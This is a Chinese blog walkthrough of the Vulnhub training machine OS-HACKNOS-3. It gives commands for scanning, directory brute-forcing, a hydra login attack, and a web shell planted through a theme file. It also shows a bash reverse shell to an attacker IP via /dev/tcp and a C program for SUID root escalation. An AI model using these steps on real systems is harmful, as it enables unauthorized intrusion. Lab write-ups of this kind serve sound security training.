【Vulnhub】靶机OS-HACKNOS-3

前言

  • Vulnhub刷题简单记录

OS-HACKNOS-3

描述

  • 难度:中级

    Flag: 2 标记第一个用户和第二个根用户

    学习:Web 应用程序 | 枚举 | 权限提升

    网址:www.hacknos.com

https://www.vulnhub.com/entry/hacknos-os-hacknos-3,410/

OS-HACKNOS-3

1、可以用两种方法确认靶场的存在,扫ip

1
2
netdiscover -i eth0 -r 192.168.1.0/24
nmap -sn 192.168.1.0/24

2、扫目标端口开发情况

1
2
3
nmap -p- -T5 192.168.56.102 #全端口扫描
nmap -sV -sC -p 22,25,80,110 -A 192.168.56.102 -o h-3
nmap -p- -A 192.168.56.102 -T5 -oA h-3

3、访问主页,根据提示说有一个password_resets,我们扫一下目录情况

1
2
3
4
5
gobuster dir -u http://192.168.56.102/websec -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100 --wildcard | grep -v 4647

dirb http://192.168.1.102/

dirsearch -u 192.168.136.150 -e* -x 403

4、爬取页面的关键词,页面也收集到邮箱contact@hacknos.com

1
cewl http://192.168.56.102/websec/ > cewl.txt

5、接着用hydra爆破页面

1
hydra -l contact@hacknos.com -P cewl.txt  192.168.56.102 http-post-form "/websec/admin:username=^USER^&password=^PASS^:Wrong email" -V

image-20210923212338360

6、进入管理员后台,经典的theme改header.php来直接命令执行和反弹shell

image-20210923212634589

1
bash -c 'exec bash -i &>/dev/tcp/192.168.56.1/1234 0>&1'

5、利用suid提权

1
2
find / -type f -perm -u=s 2>/dev/null
/usr/bin/cpulimit

6、用c语言写个root权限执行bin/sh

1
2
3
4
5
6
7
8
9
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main(int argc,char *argv[])
{
setreuid(0,0);
execve("/bin/bash",NULL,NULL);
}

image-20210923220037602

image-20210923220134498

我的个人博客

孤桜懶契:http://gylq.gitee.io

本文标题:【Vulnhub】靶机OS-HACKNOS-3

文章作者:孤桜懶契

发布时间:2021年09月23日 - 20:44:31

最后更新:2022年05月20日 - 11:47:45

原始链接:https://gylq.gitee.io/posts/149.html

许可协议: 署名-非商业性使用-禁止演绎 4.0 国际 转载请保留原文链接及作者。

-------------------本文结束 感谢您的阅读-------------------